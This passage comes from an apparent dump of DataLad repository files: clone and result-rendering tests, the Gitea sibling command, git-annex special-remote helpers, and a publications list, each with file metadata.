ephemeral clone using relative path\n # https://github.com/datalad/datalad/issues/7469\n with chpwd(op.dirname(origin_path)):\n clone4 = clone(op.basename(origin_path), op.basename(clone4_path), reckless='ephemeral')\n check_clone(clone4)\n\n\n@with_tempfile(mkdir=True)\ndef test_clone_unborn_head(path=None):\n ds_origin = Dataset(op.join(path, \"a\")).create()\n repo = ds_origin.repo\n managed = repo.is_managed_branch()\n\n # The setup below is involved, mostly because it's accounting for adjusted\n # branches. The scenario itself isn't so complicated, though:\n #\n # * a checked out default branch with no commits\n # * a (potentially adjusted) \"abc\" branch with commits.\n # * a (potentially adjusted) \"chooseme\" branch whose tip commit has a\n # more recent commit than any in \"abc\".\n (ds_origin.pathobj / \"foo\").write_text(\"foo content\")\n ds_origin.save(message=\"foo\")\n for res in repo.for_each_ref_(fields=\"refname\"):\n ref = res[\"refname\"]\n if DEFAULT_BRANCH in ref:\n repo.update_ref(ref.replace(DEFAULT_BRANCH, \"abc\"), ref)\n repo.call_git([\"update-ref\", \"-d\", ref])\n repo.update_ref(\"HEAD\",\n \"refs/heads/{}\".format(\n \"adjusted/abc(unlocked)\" if managed else \"abc\"),\n symbolic=True)\n abc_ts = int(repo.format_commit(\"%ct\"))\n repo.call_git([\"checkout\", \"-b\", \"chooseme\", \"abc~1\"])\n if managed:\n repo.adjust()\n (ds_origin.pathobj / \"bar\").write_text(\"bar content\")\n with set_date(abc_ts + 1):\n ds_origin.save(message=\"bar\")\n # Make the git-annex branch the most recently updated ref so that we test\n # that it is skipped.\n with set_date(abc_ts + 2):\n ds_origin.drop(\"bar\", reckless='kill')\n ds_origin.repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\"])\n\n ds = clone(ds_origin.path, op.join(path, \"b\"))\n # We landed on the branch with the most recent commit, ignoring the\n # git-annex branch.\n branch = ds.repo.get_active_branch()\n eq_(ds.repo.get_corresponding_branch(branch) or branch,\n \"chooseme\")\n eq_(ds_origin.repo.get_hexsha(\"chooseme\"),\n ds.repo.get_hexsha(\"chooseme\"))\n # In the context of this test, the clone should be on an adjusted branch if\n # the source landed there initially because we're on the same file system.\n eq_(managed, ds.repo.is_managed_branch())\n\n\n@with_tempfile(mkdir=True)\ndef test_clone_unborn_head_no_other_ref(path=None):\n ds_origin = Dataset(op.join(path, \"a\")).create(annex=False)\n ds_origin.repo.call_git([\"update-ref\", \"-d\",\n \"refs/heads/\" + DEFAULT_BRANCH])\n with swallow_logs(new_level=logging.WARNING) as cml:\n clone(source=ds_origin.path, path=op.join(path, \"b\"))\n assert_in(\"could not find a branch with commits\", cml.out)\n\n\n@with_tempfile(mkdir=True)\ndef test_clone_unborn_head_sub(path=None):\n ds_origin = Dataset(op.join(path, \"a\")).create()\n ds_origin_sub = Dataset(op.join(path, \"a\", \"sub\")).create()\n managed = ds_origin_sub.repo.is_managed_branch()\n ds_origin.save(message=\"foo\")\n sub_repo = ds_origin_sub.repo\n # As with test_clone_unborn_head(), the setup below is complicated mostly\n # because it's accounting for adjusted branches, but the scenario itself\n # isn't too complicated:\n #\n # * a submodule's HEAD points to a checked out branch with no commits\n # while a (potentially adjusted) \"other\" branch has commits\n #\n # * the parent repo has the tip of \"other\" as the last recorded state\n for res in sub_repo.for_each_ref_(fields=\"refname\"):\n ref = res[\"refname\"]\n if DEFAULT_BRANCH in ref:\n 
sub_repo.update_ref(ref.replace(DEFAULT_BRANCH, \"other\"), ref)\n sub_repo.call_git([\"update-ref\", \"-d\", ref])\n sub_repo.update_ref(\n \"HEAD\",\n \"refs/heads/{}\".format(\n \"adjusted/other(unlocked)\" if managed else \"other\"),\n symbolic=True)\n # END complicated handling for adjusted branches\n ds_origin.save()\n ds_origin_sub.repo.checkout(DEFAULT_BRANCH, options=[\"--orphan\"])\n\n ds_cloned = clone(source=ds_origin.path, path=op.join(path, \"b\"))\n ds_cloned_sub = ds_cloned.get(\n \"sub\", result_xfm=\"datasets\", return_type=\"item-or-list\")\n\n branch = ds_cloned_sub.repo.get_active_branch()\n eq_(ds_cloned_sub.repo.get_corresponding_branch(branch) or branch,\n \"other\")\n # In the context of this test, the clone should be on an adjusted branch if\n # the source landed there initially because we're on the same file system.\n eq_(managed, ds_cloned_sub.repo.is_managed_branch())\n\n\n@xfail_buggy_annex_info\n@skip_if_no_network\n@with_tempfile\ndef test_gin_cloning(path=None):\n # can we clone a public ds anoynmously from gin and retrieve content\n ds = clone('https://gin.g-node.org/datalad/datalad-ci-target', path)\n ok_(ds.is_installed())\n annex_path = op.join('annex', 'two')\n git_path = op.join('git', 'one')\n eq_(ds.repo.file_has_content(annex_path), False)\n eq_(ds.repo.is_under_annex(git_path), False)\n result = ds.get(annex_path)\n assert_result_count(result, 1)\n assert_status('ok', result)\n eq_(result[0]['path'], op.join(ds.path, annex_path))\n ok_file_has_content(op.join(ds.path, annex_path), 'two\\n')\n ok_file_has_content(op.join(ds.path, git_path), 'one\\n')\n\n\n# TODO: git-annex-init fails in the second clone call below when this is\n# executed under ./tools/eval_under_testloopfs.\n@skip_if_adjusted_branch\n@with_tree(tree={\"special\": {\"f0\": \"0\"}})\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_fetch_git_special_remote(url_path=None, url=None, path=None):\n url_path = Path(url_path)\n path = Path(path)\n ds_special = Dataset(url_path / \"special\").create(force=True)\n ds_special.save()\n ds_special.repo.call_git([\"update-server-info\"])\n\n clone_url = url + \"special/.git\"\n ds_a = clone(clone_url, path / \"a\")\n ds_a.repo.call_annex(\n [\"initremote\", \"special\", \"type=git\", \"autoenable=true\",\n \"location=\" + clone_url])\n\n # Set up a situation where a file is present only on the special remote,\n # and its existence is known only to the special remote's git-annex branch.\n (ds_special.pathobj / \"f1\").write_text(\"1\")\n ds_special.save()\n ds_special.repo.call_git([\"update-server-info\"])\n\n ds_a.repo.fetch(DEFAULT_REMOTE)\n ds_a.repo.merge(f\"{DEFAULT_REMOTE}/{DEFAULT_BRANCH}\")\n\n ds_b = clone(ds_a.path, path / \"other\")\n ds_b.get(\"f1\")\n ok_(ds_b.repo.file_has_content(\"f1\"))\n\n\n@skip_if_adjusted_branch\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_nonuniform_adjusted_subdataset(path=None):\n # https://github.com/datalad/datalad/issues/5107\n topds = Dataset(Path(path) / \"top\").create()\n subds_url = 'https://github.com/datalad/testrepo--basic--r1'\n topds.clone(\n source='https://github.com/datalad/testrepo--basic--r1',\n path='subds')\n eq_(topds.subdatasets(return_type='item-or-list')['gitmodule_url'],\n subds_url)\n\n\n@with_tempfile\ndef test_clone_recorded_subds_reset(path=None):\n path = Path(path)\n ds_a = create(path / \"ds_a\")\n ds_a_sub = ds_a.create(\"sub\")\n (ds_a_sub.pathobj / \"foo\").write_text(\"foo\")\n ds_a.save(recursive=True)\n (ds_a_sub.pathobj / 
\"bar\").write_text(\"bar\")\n ds_a_sub.save()\n\n ds_b = clone(ds_a.path, path / \"ds_b\")\n ds_b.get(\"sub\")\n assert_repo_status(ds_b.path)\n sub_repo = Dataset(path / \"ds_b\" / \"sub\").repo\n branch = sub_repo.get_active_branch()\n eq_(ds_b.subdatasets()[0][\"gitshasum\"],\n sub_repo.get_hexsha(\n sub_repo.get_corresponding_branch(branch) or branch))\n\n\n@with_tempfile\ndef test_clone_git_clone_opts(path=None):\n path = Path(path)\n ds_a = create(path / \"ds_a\", annex=False)\n\n repo_a = ds_a.repo\n repo_a.commit(msg=\"c1\", options=[\"--allow-empty\"])\n repo_a.checkout(DEFAULT_BRANCH + \"-other\", [\"-b\"])\n repo_a.commit(msg=\"c2\", options=[\"--allow-empty\"])\n repo_a.tag(\"atag\")\n\n ds_b = clone(ds_a.path, path / \"ds_b\",\n git_clone_opts=[f\"--branch={DEFAULT_BRANCH}\",\n \"--single-branch\", \"--no-tags\"])\n repo_b = ds_b.repo\n eq_(repo_b.get_active_branch(), DEFAULT_BRANCH)\n eq_(set(x[\"refname\"] for x in repo_b.for_each_ref_(fields=\"refname\")),\n {f\"refs/heads/{DEFAULT_BRANCH}\",\n f\"refs/remotes/{DEFAULT_REMOTE}/{DEFAULT_BRANCH}\"})\n\n\n@with_tempfile\n@with_tempfile\ndef test_clone_url_mapping(src_path=None, dest_path=None):\n src = create(src_path)\n dest = Dataset(dest_path)\n # check that the impossible doesn't work\n assert_raises(IncompleteResultsError, clone, 'rambo', dest_path)\n # rather than adding test URL mapping here, consider\n # test_url_mapping_specs(), it is cheaper there\n\n # anticipate windows test paths and escape them\n escaped_subst = (r',rambo,%s' % src_path).replace('\\\\', '\\\\\\\\')\n for specs in (\n # we can clone with a simple substitution\n {'datalad.clone.url-substitute.mike': escaped_subst},\n # a prior match to a dysfunctional URL doesn't impact success\n {\n 'datalad.clone.url-substitute.no': ',rambo,picknick',\n 'datalad.clone.url-substitute.mike': escaped_subst,\n }):\n try:\n with patch.dict(dest.config._merged_store, specs):\n clone('rambo', dest_path)\n finally:\n dest.drop(what='all', reckless='kill', recursive=True)\n\n # check submodule config impact\n dest.create()\n with patch.dict(dest.config._merged_store,\n {'datalad.clone.url-substitute.mike': escaped_subst}):\n dest.clone('rambo', 'subds')\n submod_rec = dest.repo.get_submodules()[0]\n # we record the original-original URL\n eq_(submod_rec['gitmodule_datalad-url'], 'rambo')\n # and put the effective one as the primary URL\n eq_(submod_rec['gitmodule_url'], Path(src_path).as_posix())\n\n\n_nomatch_map = {\n 'datalad.clone.url-substitute.nomatch': (\n ',nomatch,NULL',\n )\n}\n_windows_map = {\n 'datalad.clone.url-substitute.win': (\n r',C:\\\\Users\\\\datalad\\\\from,D:\\\\to',\n )\n}\n\n\ndef test_url_mapping_specs():\n from datalad.core.distributed.clone_utils import _map_urls\n cfg = ConfigManager()\n for m, i, o in (\n # path redirect on windows\n (_windows_map,\n r'C:\\Users\\datalad\\from',\n r'D:\\to'),\n # test standard github mapping, no pathc needed\n ({},\n 'https://github.com/datalad/testrepo_gh/sub _1',\n 'https://github.com/datalad/testrepo_gh-sub__1'),\n # trailing slash is not mapped\n ({},\n 'https://github.com/datalad/testrepo_gh/sub _1/',\n 'https://github.com/datalad/testrepo_gh-sub__1/'),\n # and on deep subdataset too\n ({},\n 'https://github.com/datalad/testrepo_gh/sub _1/d/sub_- 1',\n 'https://github.com/datalad/testrepo_gh-sub__1-d-sub_-_1'),\n # test that the presence of another mapping spec doesn't ruin\n # the outcome\n (_nomatch_map,\n 'https://github.com/datalad/testrepo_gh/sub _1',\n 
'https://github.com/datalad/testrepo_gh-sub__1'),\n # verify OSF mapping, but see\n # https://github.com/datalad/datalad/issues/5769 for future\n # implications\n ({},\n 'https://osf.io/q8xnk/',\n 'osf://q8xnk'),\n ):\n with patch.dict(cfg._merged_store, m):\n eq_(_map_urls(cfg, [i]), [o])\n" }, { "alpha_fraction": 0.5585106611251831, "alphanum_fraction": 0.5604448914527893, "avg_line_length": 38.769229888916016, "blob_id": "2c07eae1d11574959b05f637a24b6e88bc39a816", "content_id": "37ff4bc6378e735c5926f9483ee10f55ae93affb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2068, "license_type": "permissive", "max_line_length": 84, "num_lines": 52, "path": "/datalad/core/local/tests/test_results.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test result handling\"\"\"\n\nfrom datalad.interface.utils import generic_result_renderer\nfrom datalad.tests.utils_pytest import (\n assert_in,\n swallow_outputs,\n)\nfrom datalad.utils import on_windows\n\n\ndef test_generic_result_renderer():\n # a bunch of bad cases of results\n testcases = [\n # an empty result will surface\n ({}, ['<action-unspecified>(<status-unspecified>)']),\n # non-standard status makes it out again\n (dict(status='funky'), ['<action-unspecified>(funky)']),\n # just an action result is enough to get some output\n (dict(action='funky'), ['funky(<status-unspecified>)']),\n # a plain path produces output, although\n (dict(path='funky'), ['<action-unspecified>(<status-unspecified>): funky']),\n # plain type makes it through\n (dict(type='funky'),\n ['<action-unspecified>(<status-unspecified>): (funky)']),\n # plain message makes it through\n (dict(message='funky', error_message='extra-funky'),\n ['<action-unspecified>(<status-unspecified>): [funky] [extra-funky]']),\n ]\n if on_windows:\n testcases.extend([\n # if relpath'ing is not possible, takes the path verbatim\n (dict(path='C:\\\\funky', refds='D:\\\\medina'),\n ['<action-unspecified>(<status-unspecified>): C:\\\\funky']),\n ])\n else:\n testcases.extend([\n (dict(path='/funky/cold/medina', refds='/funky'),\n ['<action-unspecified>(<status-unspecified>): cold/medina']),\n ])\n for result, contenttests in testcases:\n with swallow_outputs() as cmo:\n generic_result_renderer(result)\n for ctest in contenttests:\n assert_in(ctest, cmo.out)\n" }, { "alpha_fraction": 0.5833786129951477, "alphanum_fraction": 0.5859134793281555, "avg_line_length": 35.09803771972656, "blob_id": "44ac96e57158449201f9d09c755c8d8b2b1bdb19", "content_id": "21aa81b78c9d6d010cbc3a6391eec7e4bf77a360", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5523, "license_type": "permissive", "max_line_length": 87, "num_lines": 153, "path": "/datalad/distributed/create_sibling_gitea.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad 
package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on a Gitea instance\n\"\"\"\n\nimport logging\n\nimport requests\n\nfrom datalad.distributed.create_sibling_ghlike import _create_sibling\nfrom datalad.distributed.create_sibling_gogs import _GOGS\nfrom datalad.distribution.dataset import datasetmethod\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_gitea')\n\n\nclass _Gitea(_GOGS):\n \"\"\"Customizations for the Gitea platform\"\"\"\n name = 'gitea'\n fullname = 'Gitea'\n response_code_unauthorized = 401\n extra_remote_settings = {\n # first make sure that annex doesn't touch this one\n # but respect any existing config\n 'annex-ignore': 'true',\n }\n\n def repo_create_response(self, r):\n \"\"\"\n At present the only difference from the GHlike implementation\n is the detection of an already existing via a proper 409 response.\n \"\"\"\n try:\n response = r.json()\n except Exception as e:\n lgr.debug('Cannot get JSON payload of %s [%s]' , r, e)\n response = {}\n lgr.debug('%s responded with %s %s', self.fullname, r, response)\n if r.status_code == requests.codes.created:\n return dict(\n status='ok',\n preexisted=False,\n # perform some normalization\n reponame=response.get('name'),\n private=response.get('private'),\n clone_url=response.get('clone_url'),\n ssh_url=response.get('ssh_url'),\n html_url=response.get('html_url'),\n # and also return in full\n host_response=response,\n )\n elif r.status_code == requests.codes.conflict and \\\n 'already exist' in response.get('message', ''):\n return dict(\n status='impossible',\n message='repository already exists',\n preexisted=True,\n )\n elif r.status_code in (self.response_code_unauthorized,\n requests.codes.forbidden):\n return dict(\n status='error',\n message=('unauthorized: %s', response.get('message')),\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n # catch-all\n raise RuntimeError(f'Unexpected host response: {response}')\n\n\n@build_doc\nclass CreateSiblingGitea(Interface):\n \"\"\"Create a dataset sibling on a Gitea site\n\n Gitea is a lightweight, free and open source code hosting solution with\n low resource demands that enable running it on inexpensive devices like\n a Raspberry Pi.\n\n This command uses the main Gitea instance at https://gitea.com as the\n default target, but other deployments can be used via the 'api'\n parameter.\n\n In order to be able to use this command, a personal access token has to be\n generated on the platform (Account->Settings->Applications->Generate Token).\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Gitea instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n .. 
versionadded:: 0.16\n \"\"\"\n\n _params_ = _Gitea.create_sibling_params\n _params_['api']._doc = \"\"\"\\\n URL of the Gitea instance without a 'api/<version>' suffix\"\"\"\n\n @staticmethod\n @datasetmethod(name='create_sibling_gitea')\n @eval_results\n def __call__(\n reponame,\n *,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name='gitea',\n existing='error',\n api='https://gitea.com',\n credential=None,\n access_protocol='https',\n publish_depends=None,\n private=False,\n description=None,\n dry_run=False):\n\n yield from _create_sibling(\n platform=_Gitea(\n api,\n credential,\n require_token=not dry_run,\n token_info=f'Visit {api}/user/settings/applications '\n 'to create a token'),\n reponame=reponame,\n dataset=dataset,\n recursive=recursive,\n recursion_limit=recursion_limit,\n name=name,\n existing=existing,\n access_protocol=access_protocol,\n publish_depends=publish_depends,\n private=private,\n description=description,\n dry_run=dry_run,\n )\n" }, { "alpha_fraction": 0.6586794257164001, "alphanum_fraction": 0.6586794257164001, "avg_line_length": 38.95744705200195, "blob_id": "b13fdb5a50432f37e55328597b641f9454c45f9f", "content_id": "a11d05e7ccf1fe9e250809c8ff52695dd722a3fe", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1878, "license_type": "permissive", "max_line_length": 87, "num_lines": 47, "path": "/datalad/customremotes/ria_remote.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from datalad.customremotes.main import main as super_main\nfrom datalad.distributed.ora_remote import ORARemote\nfrom datalad.support.annexrepo import AnnexRepo\n\n\nclass DeprecatedRIARemote(ORARemote):\n \"\"\"This is a shim for backwards compatibility with the old and archived\n git-annex-ria-remote, which the current ORA remote is based on. Providing\n this remote allows datasets that are configured with the old name (and the\n respective config names) to still work.\n However, this is intended to be somewhat temporary and be replaced by\n another implementation that actually migrates from ria to ora once we\n settled for an approach.\n \"\"\"\n\n def __init__(self, annex):\n super().__init__(annex)\n\n def initremote(self):\n self.message(\"special remote type 'ria' is deprecated. 
Consider \"\n \"migrating to 'ora'.\", type='info')\n super().initremote(self)\n\n def _load_local_cfg(self):\n \"\"\"Overwrite _load_local_cfg in order to initialize attributes with\n deprecated 'ria' configs if they exist and then go on to let 'super' do\n it's thing\"\"\"\n self._repo = AnnexRepo(self.gitdir)\n self.storage_host = \\\n self._repo.config.get(f\"annex.ria-remote.{self.name}.ssh-host\")\n self.store_base_path = \\\n self._repo.config.get(f\"annex.ria-remote.{self.name}.base-path\")\n self.force_write = \\\n self._repo.config.get(f\"annex.ria-remote.{self.name}.force-write\")\n self.ignore_remote_config = \\\n self._repo.config.get(f\"annex.ria-remote.{self.name}.ignore-remote-config\")\n super()._load_local_cfg()\n\n\ndef main():\n \"\"\"cmdline entry point\"\"\"\n super_main(\n cls=DeprecatedRIARemote,\n remote_name='ria',\n description=\\\n \"transport file content to and from datasets hosted in RIA stores\",\n )\n" }, { "alpha_fraction": 0.6150519251823425, "alphanum_fraction": 0.6183391213417053, "avg_line_length": 35.125, "blob_id": "64ef61b07caeec2a8dbdf8a6dea54ec9dc4cab00", "content_id": "e90d90e8de350ea3ccb0ffed9c4c4d16607b4b7a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5780, "license_type": "permissive", "max_line_length": 79, "num_lines": 160, "path": "/datalad/customremotes/base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Base classes to custom git-annex remotes (e.g. extraction from archives)\"\"\"\n\nfrom __future__ import absolute_import\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nfrom collections import Counter\n\nlgr = logging.getLogger('datalad.customremotes')\n\nfrom annexremote import (\n RemoteError,\n UnsupportedRequest,\n)\nfrom datalad.customremotes import SpecialRemote\n\nURI_PREFIX = \"dl\"\n\n\nclass AnnexCustomRemote(SpecialRemote):\n # default properties\n COST = 100\n AVAILABILITY = \"local\"\n\n def __init__(self, annex): # , availability=DEFAULT_AVAILABILITY):\n super().__init__(annex)\n # TODO self.info = {}, self.configs = {}\n\n # OPT: a counter to increment upon successful encounter of the scheme\n # (ATM only in gen_URLS but later could also be used in other\n # requests). This would allow to consider schemes in order of\n # decreasing success instead of arbitrary hardcoded order\n self._scheme_hits = Counter({s: 0 for s in self.SUPPORTED_SCHEMES})\n\n @classmethod\n def _get_custom_scheme(cls, prefix):\n \"\"\"Helper to generate custom datalad URL prefixes\n \"\"\"\n # prefix which will be used in all URLs supported by this custom remote\n # https://tools.ietf.org/html/rfc2718 dictates \"URL Schemes\" standard\n # 2.1.2 suggests that we do use // since all of our URLs will define\n # some hierarchical structure. But actually since we might encode\n # additional information (such as size) into the URL, it will not be\n # strictly conforming it. 
Thus we will not use //\n return \"%s+%s\" % (URI_PREFIX, prefix) # if .PREFIX else '')\n\n # Helper methods\n def gen_URLS(self, key):\n \"\"\"Yield URL(s) associated with a key, and keep stats on protocols.\"\"\"\n nurls = 0\n for scheme, _ in self._scheme_hits.most_common():\n scheme_ = scheme + \":\"\n scheme_urls = self.annex.geturls(key, scheme_)\n if scheme_urls:\n # note: generator would cease to exist thus not asking\n # for URLs for other schemes if this scheme is good enough\n self._scheme_hits[scheme] += 1\n for url in scheme_urls:\n nurls += 1\n yield url\n self.annex.debug(\"Processed %d URL(s) for key %s\", nurls, key)\n\n # Protocol implementation\n def initremote(self):\n pass\n\n def prepare(self):\n pass\n\n def transfer_store(self, key, local_file):\n raise UnsupportedRequest('This special remote cannot store content')\n\n def remove(self, key):\n raise RemoteError(\"Removal of content from urls is not possible\")\n\n def getcost(self):\n return self.COST\n\n def getavailability(self):\n return self.AVAILABILITY\n\n\n# this function only has anecdotal value and is not used anywhere\ndef generate_uuids():\n \"\"\"Generate UUIDs for our remotes. Even though quick, for\n consistency pre-generated and recorded in consts.py\"\"\"\n import uuid\n return {\n remote: str(uuid.uuid5(\n uuid.NAMESPACE_URL,\n 'http://datalad.org/specialremotes/%s' % remote))\n for remote in {'datalad', 'datalad-archives'}\n }\n\n\ndef init_datalad_remote(repo, remote, encryption=None, autoenable=False,\n opts=[]):\n \"\"\"Initialize datalad special remote\"\"\"\n from datalad.consts import DATALAD_SPECIAL_REMOTES_UUIDS\n lgr.info(\"Initializing special remote %s\", remote)\n remote_opts = [\n 'encryption=%s' % str(encryption).lower(),\n 'type=external',\n 'autoenable=%s' % str(bool(autoenable)).lower(),\n 'externaltype=%s' % remote\n ]\n # use unique uuid for our remotes\n # This should help with merges of disconnected repos etc\n # ATM only datalad/datalad-archives is expected,\n # so on purpose getitem\n remote_opts.append('uuid=%s' % DATALAD_SPECIAL_REMOTES_UUIDS[remote])\n return repo.init_remote(remote, remote_opts + opts)\n\n\ndef ensure_datalad_remote(repo, remote=None,\n encryption=None, autoenable=False):\n \"\"\"Initialize and enable datalad special remote if it isn't already.\n\n Parameters\n ----------\n repo : AnnexRepo\n remote : str, optional\n Special remote name. This should be one of the values in\n datalad.consts.DATALAD_SPECIAL_REMOTES_UUIDS and defaults to\n datalad.consts.DATALAD_SPECIAL_REMOTE.\n encryption, autoenable : optional\n Passed to `init_datalad_remote`.\n \"\"\"\n from datalad.consts import (\n DATALAD_SPECIAL_REMOTE,\n DATALAD_SPECIAL_REMOTES_UUIDS,\n )\n\n remote = remote or DATALAD_SPECIAL_REMOTE\n\n uuid = DATALAD_SPECIAL_REMOTES_UUIDS.get(remote)\n if not uuid:\n raise ValueError(\"'{}' is not a known datalad special remote: {}\"\n .format(remote,\n \", \".join(DATALAD_SPECIAL_REMOTES_UUIDS)))\n name = repo.get_special_remotes().get(uuid, {}).get(\"name\")\n\n if not name:\n init_datalad_remote(repo, remote,\n encryption=encryption, autoenable=autoenable)\n elif repo.is_special_annex_remote(name, check_if_known=False):\n lgr.debug(\"datalad special remote '%s' is already enabled\", name)\n else:\n lgr.info(\"datalad special remote '%s' found. 
Enabling\", name)\n repo.enable_remote(name)\n" }, { "alpha_fraction": 0.6940639019012451, "alphanum_fraction": 0.7221134901046753, "avg_line_length": 51.86206817626953, "blob_id": "45ad77f9307138f245f4f477778bea350a28188c", "content_id": "8fa685f0ff68212004466bdc040efb5135e03508", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1533, "license_type": "permissive", "max_line_length": 116, "num_lines": 29, "path": "/docs/source/publications.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Publications\n************\n\nFurther conceptual and technical information on DataLad, and applications built on DataLad,\nare available from the publications listed below.\n\nThe best of both worlds: Using semantic web with JSOB-LD. An example with NIDM Results & DataLad [poster]\n - Camille Maumet, Satrajit Ghosh, Yaroslav O. Halchenko, Dorota Jarecka, Nolan Nichols, Jean-Baptist POline, Michael Hanke\n\nOne thing to bind them all: A complete raw data structure for auto-generation of BIDS datasets [poster]\n - Benjamin Poldrack, Kyle Meyer, Yaroslav O. Halchenko, Michael Hanke\n\nFantastic containers and how to tame them [poster]\n - Yaroslav O. Halchenko, Kyle Meyer, Matt Travers, Dorota Jarecka, Satrajit Ghosh, Jakub Kaczmarzyk, Michael Hanke\n\nYODA: YODA's Organigram on Data Analysis [poster]\n - An outline of a simple approach to structuring and conducting data analyses that aims to\n tightly connect all their essential ingredients: data, code, and computational environments\n in a transparent, modular, accountable, and practical way.\n - Michael Hanke, Kyle A. Meyer, Matteo Visconti di Oleggio Castello, Benjamin Poldrack, Yaroslav O. Halchenko\n - F1000Research 2018, 7:1965 (https://doi.org/10.7490/f1000research.1116363.1)\n\nGo FAIR with DataLad [talk]\n - On DataLad's capabilities to create and maintain Findable, Accessible, Interoperable, and Re-Usable (FAIR)\n resources.\n - Michael Hanke, Yaroslav O. 
Halchenko\n - Bernstein Conference 2018 workshop: Practical approaches to research data management and reproducibility\n (`slides <https://rawgit.com/psychoinformatics-de/talk-datalad-gofair/master/index.html>`__)\n - OpenNeuro kick-off meeting, 2018, Stanford (`slide sources <https://github.com/datalad/talk-openneuro-2018>`__)\n" }, { "alpha_fraction": 0.5877985954284668, "alphanum_fraction": 0.5893614888191223, "avg_line_length": 37.2004280090332, "blob_id": "07f8fabb385abc1f4062679e35001dbd3650b15f", "content_id": "236e9fddaff2b8d50d2d6dcbade190c8c5b0dec4", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17916, "license_type": "permissive", "max_line_length": 112, "num_lines": 469, "path": "/datalad/interface/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface utility functions\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport sys\nfrom time import time\nfrom os import listdir\nfrom os.path import join as opj\nfrom os.path import isdir\nfrom os.path import relpath\nfrom os.path import sep\n\nimport json\n\nfrom typing import (\n TypeVar\n)\n# avoid import from API to not get into circular imports\nfrom datalad.utils import with_pathsep as _with_sep # TODO: RF whenever merge conflict is not upon us\nfrom datalad.utils import (\n path_startswith,\n path_is_subpath,\n ensure_unicode,\n getargspec,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.exceptions import (\n CapturedException,\n)\nfrom datalad import cfg as dlcfg\nfrom datalad.dochelpers import single_or_plural\nfrom datalad.ui import ui\nimport datalad.support.ansi_colors as ac\n\nanInterface = TypeVar('anInterface', bound='Interface')\n\nlgr = logging.getLogger('datalad.interface.utils')\n\n\n# TODO remove\n# only `drop` and `uninstall` are still using this\ndef handle_dirty_dataset(ds, mode, msg=None):\n \"\"\"Detect and treat unsaved changes as instructed by `mode`\n\n Parameters\n ----------\n ds : Dataset or None\n Dataset to be inspected. 
